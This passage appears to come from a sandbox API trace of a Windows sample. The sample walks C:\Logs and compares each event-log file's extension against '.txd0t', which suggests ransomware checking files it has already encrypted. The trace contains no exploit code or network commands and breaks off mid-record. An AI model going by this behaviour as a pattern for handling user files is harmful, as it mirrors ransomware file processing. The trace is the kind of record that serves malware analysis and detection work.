(psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.094] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.094] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.094] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t" [0119.094] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned=".txd0t" [0119.094] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.094] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", cAlternateFileName="MI98B5~1.TXD")) returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", psz2=".") returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", psz2="..") returned 1 [0119.094] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.094] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.094] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t" [0119.094] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned=".txd0t" [0119.094] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.094] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a360de0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", cAlternateFileName="MI1236~1.TXD")) returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.094] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.094] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.094] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t" [0119.094] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned=".txd0t" [0119.094] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.094] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Known Folders API Service.evtx.txd0t", cAlternateFileName="MI282F~1.TXD")) returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx.txd0t", psz2=".") returned 1 [0119.094] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx.txd0t", psz2="..") returned 1 [0119.094] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.094] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.094] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Known Folders API Service.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t" [0119.094] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned=".txd0t" [0119.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.095] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a386f92, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", cAlternateFileName="MIE7F8~1.TXD")) returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.095] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.095] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.095] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t" [0119.095] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned=".txd0t" [0119.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.095] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3d3484, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Admin.evtx.txd0t", cAlternateFileName="MI70F8~1.TXD")) returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx.txd0t", psz2=".") returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx.txd0t", psz2="..") returned 1 [0119.095] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.095] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.095] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t" [0119.095] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned=".txd0t" [0119.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.095] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3ad292, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Operational.evtx.txd0t", cAlternateFileName="MI18DD~1.TXD")) returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.095] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.095] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.095] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t" [0119.095] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned=".txd0t" [0119.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.095] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3d3484, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", cAlternateFileName="MIEB31~1.TXD")) returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.095] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.095] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.095] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t" [0119.095] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned=".txd0t" [0119.095] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.095] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3f9672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", cAlternateFileName="MI164E~1.TXD")) returned 1 [0119.095] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.096] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.096] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.096] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t" [0119.096] PathFindExtensionW (pszPath="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t") returned=".txd0t" [0119.096] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.096] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3f9672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", cAlternateFileName="MI8FB9~1.TXD")) returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.096] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.096] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.096] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.txd0t" [0119.096] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4Operational.evtx.txd0t") returned=".txd0t" [0119.096] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.096] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", cAlternateFileName="MI4A13~1.TXD")) returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", psz2=".") returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", psz2="..") returned 1 [0119.096] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.096] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.096] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t" [0119.096] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx.txd0t") returned=".txd0t" [0119.096] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.096] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a576e49, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", cAlternateFileName="MI2C6F~1.TXD")) returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", psz2=".") returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", psz2="..") returned 1 [0119.096] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.096] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.096] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t" [0119.096] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.txd0t") returned=".txd0t" [0119.096] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.096] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a4de83f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", cAlternateFileName="MI4E0B~1.TXD")) returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.096] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.096] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.097] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.097] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t" [0119.097] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned=".txd0t" [0119.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.097] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a4de83f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", cAlternateFileName="MI876D~1.TXD")) returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.097] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.097] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.097] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t" [0119.097] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned=".txd0t" [0119.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.097] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a59d09b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", cAlternateFileName="MI6A57~1.TXD")) returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", psz2=".") returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", psz2="..") returned 1 [0119.097] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.097] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.097] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t" [0119.097] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned=".txd0t" [0119.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.097] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5046ef, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", cAlternateFileName="MID58F~1.TXD")) returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.097] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.097] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.097] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t" [0119.097] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") returned=".txd0t" [0119.097] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.097] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a5046ef, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", cAlternateFileName="MI52C3~1.TXD")) returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", psz2=".") returned 1 [0119.097] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", psz2="..") returned 1 [0119.097] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.097] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.097] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t" [0119.097] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned=".txd0t" [0119.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.098] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a576e49, 